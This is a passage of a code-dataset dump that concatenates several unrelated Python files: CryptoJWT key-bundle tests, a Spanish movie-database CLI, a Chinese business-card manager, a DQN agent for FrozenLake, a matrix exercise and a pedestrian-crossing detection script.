= init_key(filename, \"RSA\")\n assert _jwk4 == _jwk3\n\n\ndef test_export_inactive():\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([desc])\n assert len(kb.keys()) == 1\n for k in kb.keys():\n kb.mark_as_inactive(k.kid)\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb.add_jwk_dicts([desc])\n res = kb.dump()\n assert set(res.keys()) == {\n \"cache_time\",\n \"etag\",\n \"fileformat\",\n \"httpc_params\",\n \"ignore_errors_until\",\n \"ignore_errors_period\",\n \"ignore_invalid_keys\",\n \"imp_jwks\",\n \"keys\",\n \"keytype\",\n \"keyusage\",\n \"last_updated\",\n \"last_remote\",\n \"last_local\",\n \"remote\",\n \"local\",\n \"source\",\n \"time_out\",\n }\n\n kb2 = KeyBundle().load(res)\n assert len(kb2.keys()) == 2\n assert len(kb2.active_keys()) == 1\n\n\ndef test_remote():\n source = \"https://example.com/test_remote/keys.json\"\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, json=JWKS_DICT, status=200)\n httpc_params = 
{\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n kb._do_remote()\n\n exp = kb.dump()\n kb2 = KeyBundle().load(exp)\n assert kb2.source == source\n assert len(kb2.keys()) == 4\n assert len(kb2.get(\"rsa\")) == 1\n assert len(kb2.get(\"oct\")) == 1\n assert len(kb2.get(\"ec\")) == 1\n assert len(kb2.get(\"okp\")) == 1\n assert kb2.httpc_params == {\"timeout\": (2, 2)}\n assert kb2.imp_jwks\n assert kb2.last_updated\n\n\ndef test_remote_not_modified():\n source = \"https://example.com/test_remote_not_modified/keys.json\"\n headers = {\n \"Date\": \"Fri, 15 Mar 2019 10:14:25 GMT\",\n \"Last-Modified\": \"Fri, 1 Jan 1970 00:00:00 GMT\",\n }\n headers = {}\n\n # Mock response\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, json=JWKS_DICT, status=200, headers=headers)\n updated, _ = kb._do_remote()\n assert updated == True\n assert kb.last_remote == headers.get(\"Last-Modified\")\n timeout1 = kb.time_out\n\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, status=304, headers=headers)\n updated, _ = kb._do_remote()\n assert not updated\n assert kb.last_remote == headers.get(\"Last-Modified\")\n timeout2 = kb.time_out\n\n assert timeout1 != timeout2\n\n exp = kb.dump()\n kb2 = KeyBundle().load(exp)\n assert kb2.source == source\n assert len(kb2.keys()) == 4\n assert len(kb2.active_keys()) == 4\n assert len(kb2.get(\"rsa\")) == 1\n assert len(kb2.get(\"oct\")) == 1\n assert len(kb2.get(\"ec\")) == 1\n assert len(kb2.get(\"okp\")) == 1\n assert kb2.httpc_params == {\"timeout\": (2, 2)}\n assert kb2.imp_jwks\n assert kb2.last_updated\n\n\ndef test_ignore_errors_period():\n source_good = \"https://example.com/test_ignore_errors_period/keys.json\"\n source_bad = \"https://example.com/test_ignore_errors_period/keys-bad.json\"\n ignore_errors_period = 1\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source_good, json=JWKS_DICT, status=200)\n rsps.add(method=\"GET\", url=source_bad, json=JWKS_DICT, status=500)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(\n source=source_good,\n httpc=requests.request,\n httpc_params=httpc_params,\n ignore_errors_period=ignore_errors_period,\n )\n res, _ = kb._do_remote()\n assert res == True\n assert kb.ignore_errors_until is None\n\n # refetch, but fail by using a bad source\n kb.source = source_bad\n try:\n res, _ = kb._do_remote()\n except UpdateFailed:\n pass\n\n # retry should fail silently as we're in holddown\n res, _ = kb._do_remote()\n assert kb.ignore_errors_until is not None\n assert res == False\n\n # wait until holddown\n time.sleep(ignore_errors_period + 1)\n\n # try again\n kb.source = source_good\n res, _ = kb._do_remote()\n assert res == True\n\n\ndef test_ignore_invalid_keys():\n rsa_key_dict = new_rsa_key().serialize()\n rsa_key_dict[\"kty\"] = \"b0rken\"\n\n kb = KeyBundle(keys={\"keys\": [rsa_key_dict]}, ignore_invalid_keys=True)\n assert len(kb) == 0\n\n with pytest.raises(UnknownKeyType):\n KeyBundle(keys={\"keys\": [rsa_key_dict]}, ignore_invalid_keys=False)\n\n\ndef test_exclude_attributes():\n source = \"https://example.com/test_exclude_attributes/keys.json\"\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", 
url=source, json=JWKS_DICT, status=200)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n kb._do_remote()\n\n exp = kb.dump(exclude_attributes=[\"cache_time\", \"ignore_invalid_keys\"])\n kb2 = KeyBundle(cache_time=600, ignore_invalid_keys=False).load(exp)\n assert kb2.cache_time == 600\n assert kb2.ignore_invalid_keys is False\n\n\ndef test_remote_dump_json():\n source = \"https://example.com/keys.json\"\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, json=JWKS_DICT, status=200)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n kb._do_remote()\n\n exp = kb.dump()\n assert json.dumps(exp)\n","repo_name":"IdentityPython/JWTConnect-Python-CryptoJWT","sub_path":"tests/test_03_key_bundle.py","file_name":"test_03_key_bundle.py","file_ext":"py","file_size_in_byte":32540,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"41829900201","text":"from clases import Persona, Director, Actor, Pelicula\r\nfrom datetime import datetime\r\nfrom tuplas import SEXO, devuelve_sexo, ESTILO_PELI, devuelve_estilo\r\nimport re\r\n\r\n\r\ndef valida_fecha(titulo):\r\n while True:\r\n fecha = input(f'Ingrese una fecha en el formato YYYY-MM-DD para {titulo}: ')\r\n try:\r\n fecha_formato = datetime.strptime(fecha, '%Y-%m-%d')\r\n return fecha_formato\r\n except ValueError:\r\n print(f'La {titulo} no está en el formato correcto (YYYY-MM-DD)...!')\r\n\r\n\r\ndef valida_int(titulo):\r\n while True:\r\n try:\r\n num = int(input(f'Ingrese {titulo}'))\r\n if num >= 0:\r\n return num\r\n print('El valor ingresado no es el correcto')\r\n except:\r\n print(f'Valor ingresado incorrecto, {titulo}')\r\n\r\n\r\ndef valida_sexo():\r\n opciones = ['{}. 
{}'.format(codigo, descripcion) for codigo, descripcion in SEXO]\r\n v_sexo = [codigo for codigo, _ in SEXO]\r\n while True:\r\n sexo = valida_int(f'Sexo, valor numérico {opciones} : ')\r\n if sexo in v_sexo:\r\n return sexo\r\n print(f'El ID del sexo no es el correcto, verificar las opciones {opciones}')\r\n\r\n\r\ndef valida_mail():\r\n while True:\r\n email = input('Correo: ')\r\n if re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\r\n return email\r\n print('Correo incorrecto, ingrese nuevamente.')\r\n\r\n\r\ndef valida_cedula():\r\n while True:\r\n cedula = input('Cédula: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n return cedula\r\n print(f'La cédula {cedula}, ya existe')\r\n\r\n\r\ndef crear_persona():\r\n print('INGRESO DE DATOS')\r\n cedula = valida_cedula()\r\n nombre = input('Nombre: ').upper()\r\n apellido = input('Apellido: ').upper()\r\n fecha_nacimiento = valida_fecha('Fecha Nacimiento')\r\n sexo = valida_sexo()\r\n email = valida_mail()\r\n persona = Persona(None, cedula, nombre, apellido, fecha_nacimiento, sexo, email)\r\n persona.inserta_persona()\r\n\r\n\r\ndef modificar_persona():\r\n print('MODIFICACIÓN DE DATOS')\r\n cedula = input('Cédula a modificar: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n nombre = input('Nombre: ').upper()\r\n apellido = input('Apellido: ').upper()\r\n fecha_nacimiento = valida_fecha('Fecha Nacimiento')\r\n sexo = valida_sexo()\r\n email = valida_mail()\r\n persona = Persona(persona[0], cedula, nombre, apellido, fecha_nacimiento, sexo, email)\r\n persona.actualiza_persona()\r\n\r\n\r\ndef consulta_una_persona():\r\n print('PRESENTACIÓN DE DATOS')\r\n cedula = input('Cédula a consultar: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n sexo = devuelve_sexo(persona[5])\r\n print('{:<10} {:<10} {:<20} {:<20} {:<15} {:<10} {:<30}'.format('ID', 'CÉDULA', 'NOMBRE', 'APELLIDO',\r\n 'FECH. NAC.', 'SEXO', 'EMAIL'))\r\n print('{:<10} {:<10} {:<20} {:<20} {:<15} {:<10} {:<30}'.format(persona[0], persona[1], persona[2], persona[3],\r\n str(persona[4]), sexo, persona[6]))\r\n\r\n\r\ndef eliminar_persona():\r\n print('ELIMINACIÓN DE DATOS')\r\n cedula = input('Cédula a eliminar: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n persona = Persona(persona[0], '', '', '', '', '', '')\r\n persona.eliminar_persona()\r\n\r\n\r\ndef valida_estilo_peli():\r\n opciones = ['{}. {}'.format(codigo, descripcion) for codigo, descripcion in ESTILO_PELI]\r\n v_estilo_peli = [codigo for codigo, _ in ESTILO_PELI]\r\n while True:\r\n peli = valida_int(f'Estilo Peli, valor numérico {opciones} : ')\r\n if peli in v_estilo_peli:\r\n return peli\r\n print(f'El ID del Estilo Peli no es el correcto, verificar las opciones {opciones}')\r\n\r\ndef consulta_un_director():\r\n print('PRESENTACIÓN DE DATOS')\r\n cedula = input('Cédula a consultar: ')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n print('No existe DIRECTOR con esta cédula...!')\r\n return\r\n estilo = devuelve_estilo(director[2])\r\n print('{:<10} {:<30} {:<20} {:<15} {:<20} {:<10} {:<30}'.format('CÉDULA', 'DIRECTOR', 'EMAIL', 'PELI. 
DIR.',\r\n 'ESTILO PELI', 'PREMIOS', 'BIOGRAFÍA'))\r\n print('{:<10} {:<30} {:<20} {:<15} {:<20} {:<10} {:<30}'.format(director[6], director[7] + ' ' + director[8], director[11],\r\n director[1], estilo, director[3], director[4]))\r\n\r\n\r\ndef crear_director():\r\n print('INGRESO DE DATOS')\r\n cedula = input('Cédula:')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n num_peliculas_dirigidas = valida_int('Num. Películas Dirigidas:')\r\n estilo_director = valida_estilo_peli()\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía').upper()\r\n director = Director(persona[0], persona[1], persona[2], persona[3], persona[4], persona[5], persona[6],\r\n num_peliculas_dirigidas,\r\n estilo_director, premios_ganados, biografia)\r\n director.inserta_director()\r\n print('Ya existe Director registrado...!')\r\n return\r\n\r\n\r\ndef modificar_director():\r\n print('MODIFICACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n print('No existe Director con esta cédula para modificar...!')\r\n return\r\n num_peliculas_dirigidas = valida_int('Num. Películas Dirigidas:')\r\n estilo_director = valida_estilo_peli()\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía: ').upper()\r\n director = Director(director[0], '', '', '', '', '', '', num_peliculas_dirigidas, estilo_director, premios_ganados,\r\n biografia)\r\n director.modifica_director()\r\n\r\ndef eliminar_director():\r\n print('ELIMINACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n print('No existe Director con esta cédula para eliminar...!')\r\n return\r\n director = Director(director[0], '', '', '', '', '', '', '', '', '', '')\r\n director.eliminar_director()\r\n\r\ndef crear_actor():\r\n print('INGRESO DE DATOS')\r\n cedula = input('Cédula:')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n print(persona[2], persona[3],'\\n')\r\n num_peliculas = valida_int('Num. Películas:')\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía').upper()\r\n actor = Actor(persona[0], persona[1], persona[2], persona[3], persona[4], persona[5], persona[6],\r\n num_peliculas, premios_ganados, biografia)\r\n actor.inserta_actor()\r\n print('Ya existe ACTOR registrado...!')\r\n return\r\n\r\ndef modificar_actor():\r\n print('MODIFICACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n print('No existe Actor con esta cédula para modificar...!')\r\n return\r\n num_peliculas = valida_int('Num. 
Películas:')\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía: ').upper()\r\n actor = Actor(actor[0], '', '', '', '', '', '', num_peliculas, premios_ganados, biografia)\r\n actor.modifica_actor()\r\n\r\ndef eliminar_actor():\r\n print('ELIMINACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n print('No existe Director con esta cédula para eliminar...!')\r\n return\r\n actor = Actor(actor[0], '', '', '', '', '', '', '', '', '')\r\n actor.eliminar_actor()\r\n\r\ndef consulta_un_actor():\r\n print('PRESENTACIÓN DE DATOS')\r\n cedula = input('Cédula a consultar: ')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n print('No existe ACTOR con esta cédula...!')\r\n return\r\n\r\n print('{:<10} {:<30} {:<20} {:<15} {:<10} {:<30}'.format('CÉDULA', 'ACTOR', 'EMAIL', 'NUM. PELI.',\r\n 'PREMIOS', 'BIOGRAFÍA'))\r\n print('{:<10} {:<30} {:<20} {:<15} {:<10} {:<30}'.format(actor[5], actor[6] + ' ' + actor[7], actor[10],\r\n actor[1], actor[2], actor[3]))\r\n\r\ndef valida_persona_peli(tipo_persona):\r\n while True:\r\n cedula = input(f'Cédula para {tipo_persona}: ')\r\n if tipo_persona == 'Director':\r\n d_p = Director.valida_director(cedula)\r\n else:\r\n d_p = Actor.valida_actor(cedula)\r\n if d_p is None:\r\n print(f'No existe un {tipo_persona} con esa cédula')\r\n continue\r\n return d_p[0]\r\n\r\n##id, titulo, fecha_estreno, director_id, genero, actor_id\r\ndef crear_pelicula():\r\n print('INGRESO DE DATOS')\r\n titulo = input('Nombre Película:').upper()\r\n fecha_estreno = valida_fecha('Fecha Estreno')\r\n director_id = valida_persona_peli('Director')\r\n genero = valida_estilo_peli()\r\n actor_id = valida_persona_peli('Actor')\r\n pelicula = Pelicula(None, titulo, fecha_estreno, director_id, genero, actor_id)\r\n pelicula.inserta_pelicula()\r\n\r\n\r\ndef opcion_menu(titulo, ms):\r\n while True:\r\n while True:\r\n print(f'** OPCIÓN {titulo.upper()} **')\r\n print(f'1. Crear {titulo}')\r\n print(f'2. Modificar {titulo}')\r\n print(f'3. Eliminar {titulo}')\r\n print(f'4. {titulo} consultar Todos')\r\n print(f'5. {titulo} consultar uno')\r\n print(f'6. Regresar al menú principal')\r\n try:\r\n opc = int(input(f'Seleccione una opción del menú {titulo} (1-6):'))\r\n if 1 <= opc <= 6: # AND\r\n break\r\n except:\r\n print('Por favor, seleccione una opción correcta (1-6)...!')\r\n\r\n if opc == 6:\r\n main_menu()\r\n elif ms == 1:\r\n if opc == 1:\r\n crear_persona()\r\n elif opc == 2:\r\n modificar_persona()\r\n elif opc == 3:\r\n eliminar_persona()\r\n elif opc == 4:\r\n Persona.lista_personas()\r\n else:\r\n consulta_una_persona()\r\n elif ms == 2:\r\n if opc == 1:\r\n crear_director()\r\n elif opc == 2:\r\n modificar_director()\r\n elif opc == 3:\r\n eliminar_director()\r\n elif opc == 4:\r\n Director.lista_directores()\r\n else:\r\n consulta_un_director()\r\n elif ms == 3:\r\n if opc == 1:\r\n crear_actor()\r\n elif opc == 2:\r\n modificar_actor()\r\n elif opc == 3:\r\n eliminar_actor()\r\n elif opc == 4:\r\n Actor.lista_actores()\r\n else:\r\n consulta_un_actor()\r\n elif ms == 4:\r\n if opc == 1:\r\n crear_pelicula()\r\n elif opc == 2:\r\n pass # proceso de modificar pelicula\r\n elif opc == 3:\r\n pass # proceso de eliminar pelicula\r\n elif opc == 4:\r\n Pelicula.lista_peliculas()\r\n else:\r\n pass # proceso de consul. una pelicula\r\n\r\n\r\ndef main_menu():\r\n while True:\r\n print('** MENÚ DEL SISTEMA **')\r\n print('1. 
Persona') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('2. Director') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('3. Actor') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('4. Películas') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('5. Salir')\r\n try:\r\n opc = int(input('Seleccione una opción del menú (1-5):'))\r\n if 1 <= opc <= 5: # AND\r\n break\r\n except:\r\n print('Por favor, seleccione una opción correcta (1-5)...!')\r\n\r\n if opc == 1:\r\n opcion_menu('Persona', opc)\r\n elif opc == 2:\r\n opcion_menu('Director', opc)\r\n elif opc == 3:\r\n opcion_menu('Actor', opc)\r\n elif opc == 4:\r\n opcion_menu('Películas', opc)\r\n else:\r\n print('Cerrar sesión...!', opc)\r\n exit()\r\n","repo_name":"farevaloc/python_poo","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21552742027","text":"#用来存储名片的列表\ncard_infors = []\n\n\n\ndef print_menu():\n #1. 打印功能提示\n print(\"=\"*50)\n print(\" 名片管理系统\")\n print(\"1. 增加一个新名片\")\n print(\"2. 删除一个名称\")\n print(\"3. 修改一个名片\")\n print(\"4. 查询一个名片\")\n print(\"5. 显示所有名片\")\n print(\"6. 退出系统\")\n print(\"=\"*50)\n\n\ndef add_new_card_infor():\n \"\"\"完成文档输入:\"\"\"\n new_name = input(\"请输入新的名字:\")\n new_qq = input(\"请输入新的QQ:\")\n new_weixin = input(\"请输入新的微信:\")\n new_addr = input(\"请输入地址:\")\n\n # 定义一个新的字典,用来存储新的名片\n new_infor = {}\n new_infor['name'] = new_name\n new_infor['qq'] = new_qq\n new_infor[\"weixin\"] = new_weixin\n new_infor['addr'] = new_addr\n global card_infors\n card_infors.append(new_infor)\n\n\ndef find_card_infor():\n find_name = input(\"请输入要查找的姓名:\")\n\n find_flag = 0 # 默认没有找到\n\n global card_infors\n for temp in card_infors:\n if find_name == temp[\"name\"]:\n print(\"%s\\t%s\\t%s\\t%s\"%(temp['name'],temp['qq'],temp['weixin'],temp['addr']))\n find_flag=1\n break\n if find_flag == 0:\n print(\"查无此人\")\n\ndef show_all_infor():\n \"\"\"显示所有信息\"\"\"\n print(\"姓名\\tQQ\\t微信\\t住址\")\n global card_infors\n for temp in card_infors:\n # print(temp)\n print(\"%s\\t%s\\t%s\\t%s\"%(temp['name'],temp['qq'],temp['weixin'],temp['addr']))\n\n\ndef del_card_infor():\n del_name = input(\"请输入要查找的姓名:\")\n find_flag = 0 # 默认没找到\n\n global card_infors\n for temp in card_infors:\n if del_name == temp[\"name\"]:\n card_infors.remove(temp)\n find_flag = 1\n show_all_infor()\n break\n if find_flag == 0:\n print(\"查无此人\")\n\n\ndef del_modify_infor():\n modify_name = input(\"请输入要修改信息的名称:\")\n find_flag = 0\n\n global card_infors\n for temp in card_infors:\n if modify_name == temp[\"name\"]:\n modify_content = input(\"请输入要修改的信息,如name,qq,weixin,addr等:\")\n for name in temp.keys():\n print(\"+\"*50)\n print(temp.keys())\n print(\"+\"*50)\n print(name)\n if modify_content == name:\n modify_value = input(\"请输入要修改的值:\")\n temp[name] = modify_value\n show_all_infor()\n find_flag = 1\n break\n\n if find_flag == 0:\n print(\"查无此人\")\n\n\n\n\ndef main():\n \"\"\"完成对整个程序得控制\"\"\"\n\n print_menu()\n while True:\n #2. 获取用户的输入\n num = int(input(\"请输入操作序号:\"))\n\n #3. 
根据用户的数据执行相应的功能:\n if num == 1:\n add_new_card_infor()\n elif num == 2:\n del_card_infor()\n elif num == 3:\n del_modify_infor()\n elif num == 4:\n find_card_infor()\n elif num == 5:\n show_all_infor()\n elif num == 6:\n break\n else:\n print(\"输入有误,请重新输入:\")\n\n\n\n# 调用主函数\nmain()","repo_name":"nailao946/Python","sub_path":"from web/同学录.py","file_name":"同学录.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36706084929","text":"import random\nimport time as tm\nfrom collections import deque\n\nimport numpy as np\nfrom keras import Model\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\n\nfrom env.FrozenLakeMDP import frozenLake\n\n\nclass DQNAgent:\n def __init__(self, action_size, learning_rate, model: Model, get_legal_actions):\n self.action_size = action_size\n self.memory = deque(maxlen=2000)\n self.gamma = 0.95 # discount rate\n self.epsilon = 1.0 # exploration rate\n self.epsilon_min = 0.01\n self.epsilon_decay = 0.999\n self.learning_rate = learning_rate\n self.model = model\n self.get_legal_actions = get_legal_actions\n\n def remember(self, state, action, reward, next_state, done):\n # Function adds information to the memory about last action and its results\n self.memory.append((state, action, reward, next_state, done))\n\n def get_action(self, state):\n \"\"\"\n Compute the action to take in the current state, including exploration.\n With probability self.epsilon, we should take a random action.\n otherwise - the best policy action (self.get_best_action).\n\n Note: To pick randomly from a list, use random.choice(list).\n To pick True or False with a given probablity, generate uniform number in [0, 1]\n and compare it with your probability\n \"\"\"\n\n #\n # INSERT CODE HERE to get action in a given state (according to epsilon greedy algorithm)\n #\n\n # Pick Action\n possible_actions = self.get_legal_actions(state)\n\n # If there are no legal actions, return None\n if len(possible_actions) == 0:\n return None\n\n epsilon = self.epsilon\n\n #\n # INSERT CODE HERE to get action in a given state (according to epsilon greedy algorithm)\n #\n\n best_action = self.get_best_action(state)\n chosen_action = best_action\n\n if random.uniform(0, 1) < epsilon:\n random_actions = possible_actions.copy()\n random_actions.remove(best_action)\n chosen_action = random.choice(random_actions if random_actions else [best_action])\n\n return chosen_action\n\n def get_best_action(self, state):\n \"\"\"\n Compute the best action to take in a state (using current q-values).\n \"\"\"\n possible_actions = self.get_legal_actions(state)\n\n # If there are no legal actions, return None\n if len(possible_actions) == 0:\n return None\n\n return np.argmax(self.model.predict(state))\n\n def lower_epsilon(self):\n new_epsilon = self.epsilon * self.epsilon_decay\n if new_epsilon >= self.epsilon_min:\n self.epsilon = new_epsilon\n\n def replay(self, batch_size):\n \"\"\"\n Function learn network using randomly selected actions from the memory.\n First calculates Q value for the next state and choose action with the biggest value.\n Target value is calculated according to:\n Q(s,a) := (r + gamma * max_a(Q(s', a)))\n except the situation when the next action is the last action, in such case Q(s, a) := r.\n In order to change only those weights responsible for chosing given action, the rest values should be those\n 
returned by the network for state state.\n The network should be trained on batch_size samples.\n Also every time the function replay is called self.epsilon value should be updated according to equation:\n self.epsilon *= self.epsilon_decay\n \"\"\"\n #\n # INSERT CODE HERE to train network\n #\n\n if len(self.memory) < batch_size:\n return\n\n info_sets = random.sample(self.memory, batch_size)\n states_list = []\n targets_list = []\n for info_set in info_sets:\n state, action, reward, next_state, done = info_set\n states_list.append(state.flatten())\n target = self.model.predict(state)\n if done:\n target[0][action] = reward\n else:\n Q_future = max(self.model.predict(next_state)[0])\n target[0][action] = reward + Q_future * self.gamma\n targets_list.append(target.flatten())\n\n states_array = np.array(states_list)\n targets_array = np.array(targets_list)\n\n self.model.train_on_batch(states_array, targets_array)\n self.lower_epsilon()\n\n\nenv = frozenLake(\"4x4\")\n\nstate_size = env.get_number_of_states()\naction_size = len(env.get_possible_actions(None))\nlearning_rate = 0.001\n\nmodel = Sequential()\nmodel.add(Dense(16, input_dim=state_size, activation=\"relu\"))\nmodel.add(Dense(32, activation=\"relu\"))\nmodel.add(Dense(16, activation=\"relu\"))\nmodel.add(Dense(action_size)) # wyjście\nmodel.compile(loss=\"mean_squared_error\",\n optimizer=Adam(lr=learning_rate))\n\nagent = DQNAgent(action_size, learning_rate, model, get_legal_actions=env.get_possible_actions)\n\ndone = False\nbatch_size = 64\nEPISODES = 1000\ncounter = 0\n\nfor e in range(EPISODES):\n start = tm.time()\n summary = []\n for _ in range(100):\n total_reward = 0\n env_state = env.reset()\n\n #\n # INSERT CODE HERE to prepare appropriate format of the state for network\n #\n state = np.array([to_categorical(env_state, num_classes=state_size)])\n\n for time in range(500):\n action = agent.get_action(state)\n next_state_env, reward, done, _ = env.step(action)\n total_reward += reward\n\n #\n # INSERT CODE HERE to prepare appropriate format of the next state for network\n #\n next_state = np.array([to_categorical(next_state_env, num_classes=state_size)])\n\n # add to experience memory\n agent.remember(state, action, reward, next_state, done)\n state = next_state\n if done:\n break\n\n #\n # INSERT CODE HERE to train network if in the memory is more samples then size of the batch\n #\n if len(agent.memory) > batch_size:\n agent.replay(64)\n\n summary.append(total_reward)\n\n end = tm.time()\n print(\"epoch #{}\\tmean reward = {:.3f}\\tepsilon = {:.3f}\\ttime = {}\".format(e, np.mean(summary), agent.epsilon,\n end - start))\n if np.mean(total_reward) > 0.9:\n print(\"You Win!\")\n break\n","repo_name":"Anamitr/ISI-lab","sub_path":"deep_q_learning.py","file_name":"deep_q_learning.py","file_ext":"py","file_size_in_byte":6549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70080483769","text":"#preferência por listas compostas\r\n\r\nmatriz = [[],[],[]]\r\nsoma_pares = soma_terceira = 0\r\nfor x in range(3):\r\n for y in range(3):\r\n valor = int(input(f'Digite um valor para a posição [{x,y}]: '))\r\n matriz[x].append(valor)\r\n if valor % 2 == 0:\r\n soma_pares += valor\r\n if y == 2:\r\n soma_terceira += valor\r\nprint('=-'*30)\r\nfor x in range(3):\r\n for y in range(3):\r\n print(f'[{matriz[x][y]:^5}]', end = ' ')\r\n print()\r\n\r\nprint('=-'*30)\r\nprint(f'A soma dos valores pares: {soma_pares}\\n'\r\n f'A soma dos valores da terceira coluna: 
{soma_terceira}\\n'\r\n      f'O maior valor da segunda linha: {max(matriz[1])}')\r\n\r\n","repo_name":"jdonghia/python-exercises","sub_path":"ex087.py","file_name":"ex087.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"30620282800","text":"import numpy as np\nimport argparse\nimport cv2\nfrom pose_estimation.pose_estimation import img_inference\nfrom detection.ssd_final.inference import Detector\nfrom detection.ssd_final.ssd import build_ssd\nimport os\nimport pickle\nfrom config import *\n\n\ndef main():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--rf_weights\", help=\"path to classifier\", default= CLASSIFIER_WEIGHTS)\n    ap.add_argument(\"--ssd_weights\", help=\"path to ssd weights\", default= SSD_WEIGHTS)\n    ap.add_argument(\"--input\", help=\"path to video\")\n    ap.add_argument(\"--output\", help=\"path to output\", default=\"results/\")\n    args = vars(ap.parse_args())\n    \n    ssd = build_ssd('test', 300, 21) # initialize SSD\n    ssd.load_weights(args[\"ssd_weights\"])\n    detector = Detector(ssd)\n    vid = cv2.VideoCapture(args[\"input\"])\n    fourcc = cv2.VideoWriter_fourcc(*'XVID')\n    out = cv2.VideoWriter('output.avi',fourcc, 20.0, (640,480))\n    frame_count = {}\n    ped_features = {}\n    with open(args[\"rf_weights\"], 'rb') as f:\n        classifier = pickle.load(f)\n    print(\"All Models Loaded\")\n    counter = 0\n    while True:\n        ret, frame = vid.read()\n        print(\"Frame {}\".format(counter))\n        if ret:\n            bboxes = detector.get_bbs(frame)\n            print(bboxes)\n            print(\"Found {} people\".format(len(bboxes)))\n            for i, bbox in enumerate(bboxes):\n                frame, features = img_inference(frame, bbox)\n                frame_count[\"pedestrian\" + str(i)] = 1 + frame_count.get(\"pedestrian\" + str(i), 0)\n                if \"pedestrian\" + str(i) in ped_features:\n                    if len(ped_features[\"pedestrian\" + str(i)]) >= 5544:\n                        if classifier.predict(ped_features[\"pedestrian\" + str(i)].reshape(1, -1)):\n                            frame = cv2.putText(frame, \"C\", (int(bbox[0]), int(bbox[1])), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 1)\n                        else:\n                            frame = cv2.putText(frame, \"NC\", (int(bbox[0]), int(bbox[1])), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 1)\n                        past_frames = frame_count[\"pedestrian\" + str(i)] - 14\n                        ped_features[\"pedestrian\" + str(i)] = np.append(ped_features[\"pedestrian\" + str(i)][396*past_frames: ], features)\n                    else: \n                        ped_features[\"pedestrian\" + str(i)] = np.append(ped_features[\"pedestrian\" + str(i)], features)\n                else:\n                    ped_features[\"pedestrian\" + str(i)] = features\n                frame = cv2.rectangle(np.array(frame), (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), 255, 1)\n            cv2.imwrite(args[\"output\"] + \"frame\" + str(counter) + \".jpg\", frame)\n            counter += 1\n        else:\n            break\n    vid.release()\n    out.release()\n\nif __name__ == \"__main__\":\n    